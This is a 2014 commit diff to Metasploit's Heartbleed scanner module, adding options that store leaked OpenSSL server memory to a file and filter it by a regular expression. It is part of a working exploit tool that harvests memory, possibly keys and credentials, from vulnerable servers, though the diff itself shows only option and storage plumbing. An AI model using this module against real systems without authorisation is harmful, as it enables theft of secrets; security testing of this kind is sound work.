Land rapid7#3232, Heartbleed memory dump filtering

wvu · wvu · commit 6599999b8aa2 · 2014-04-11T12:46:01.000-05:00
diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -100,7 +100,8 @@ def initialize
         'FiloSottile', # PoC site and tool
         'Christian Mehlmauer', # Msf module
         'wvu', # Msf module
-        'juan vazquez' # Msf module
+        'juan vazquez', # Msf module
+        'Sebastiano Di Paola' # Msf module
       ],
       'References'     =>
         [
@@ -120,7 +121,9 @@ def initialize
       [
         Opt::RPORT(443),
         OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]),
-        OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])
+        OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]),
+        OptBool.new('STOREDUMP', [true, 'Store leaked memory in a file', false]),
+        OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil])
       ], self.class)
 
     register_advanced_options(
@@ -291,16 +294,24 @@ def run_host(ip)
         :refs => self.references,
         :info => "Module #{self.fullname} successfully leaked info"
       })
-      path = store_loot(
-        "openssl.heartbleed.server",
-        "application/octet-stream",
-        ip,
-        heartbeat_data,
-        nil,
-        "OpenSSL Heartbleed server memory"
-      )
+      if datastore['STOREDUMP']
+        pattern = datastore['DUMPFILTER']
+        if pattern
+          match_data = heartbeat_data.scan(pattern).join
+        else
+          match_data = heartbeat_data
+        end
+        path = store_loot(
+          "openssl.heartbleed.server",
+          "application/octet-stream",
+          ip,
+          match_data,
+          nil,
+          "OpenSSL Heartbleed server memory"
+        )
+        print_status("#{peer} - Heartbeat data stored in #{path}")
+      end
       vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
-      print_status("#{peer} - Heartbeat data stored in #{path}")
     else
       vprint_error("#{peer} - Looks like there isn't leaked information...")
     end
